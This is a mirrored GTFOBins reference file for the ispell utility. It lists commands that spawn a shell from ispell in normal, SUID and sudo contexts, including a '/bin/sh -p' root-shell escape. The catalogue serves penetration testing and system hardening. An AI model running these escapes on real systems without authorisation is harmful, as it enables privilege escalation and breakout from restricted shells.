mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
50ab4f0ce0
Close #259
16 lines
228 B
Markdown
16 lines
228 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: |
|
|
ispell /etc/passwd
|
|
!/bin/sh
|
|
suid:
|
|
- code: |
|
|
./ispell /etc/passwd
|
|
!/bin/sh -p
|
|
sudo:
|
|
- code: |
|
|
sudo ispell /etc/passwd
|
|
!/bin/sh
|
|
---
|